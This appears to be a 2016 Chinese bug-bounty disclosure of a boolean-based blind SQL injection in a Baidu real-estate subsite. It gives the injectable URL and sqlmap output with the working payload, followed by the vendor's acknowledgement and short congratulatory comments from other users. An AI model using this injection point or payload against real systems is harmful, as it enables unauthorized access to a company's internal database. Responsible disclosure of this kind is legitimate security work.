百度某分站的一处SQL盲注

存在注入的地址：

http://house.baidu.com/bj/getisim/135749,150588,149882,150990,145346,134641,94282,149716,142067,148446,141967*/

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: #1* (URI)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://house.baidu.com:80/bj/getisim/135749,150588,149882,150990,14
 5346,134641,94282,149716,142067,148446,141967) AND 2747=2747#/
 ---

是一个内网的数据库

修复

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-02 17:10

厂商回复：

感谢对百度安全的关注

最新状态：

暂无

1. 2016-03-02 13:57 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

   3

   牛掰啊

   1# 回复此人

2. 2016-03-02 14:02 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   2

   这又是谁的小号么。。

   2# 回复此人

3. 2016-03-02 14:07 | 李长歌 ( 普通白帽子 | Rank:426 漏洞数:44 | /)

   2

   @px1624 新人请多多关照哈

   3# 回复此人

4. 2016-03-02 14:12 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)

   2

   牛人

   4# 回复此人

5. 2016-03-02 14:24 | Mayter ( 普通白帽子 | Rank:165 漏洞数:40 | 笼鸡有食汤锅近，野鹤无粮天地宽.)

   2

   厉害啊。

   5# 回复此人

6. 2016-03-02 14:41 | LoveSnow ( 实习白帽子 | Rank:85 漏洞数:20 | 以正和，以奇胜！)

   2

   @李长歌 新的tangscan合伙人？

   6# 回复此人

7. 2016-03-02 14:46 | 库日天 ( 路人 | Rank:18 漏洞数:9 )

   2

   牛逼啊

   7# 回复此人

8. 2016-03-02 15:16 | sangfor.org ( 实习白帽子 | Rank:54 漏洞数:26 | 天下熙熙，皆为利来； 天下攘攘，皆为利往...)

   2

   @疯狗 阅尽天下漏洞，心中自然无码 给力

   8# 回复此人

9. 2016-03-02 16:38 | boooooom ( 普通白帽子 | Rank:486 漏洞数:53 | 我有一个好想法！)

   2

   @李长歌 @LoveSnow 不是吧，tangscan还在招人呢，求贤若渴

   9# 回复此人

10. 2016-03-02 18:52 | hi1s0n ( 路人 | Rank:4 漏洞数:1 | When the time comes, I shall rise and co...)

    2

    厉害

    10# 回复此人

11. 2016-03-02 19:00 | 心云 ( 普通白帽子 | Rank:530 漏洞数:146 | 有追求，才会有提高！尽快达到下一个目标!)

    2

    666

    11# 回复此人

12. 2016-03-02 23:20 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

    2

    围观

    12# 回复此人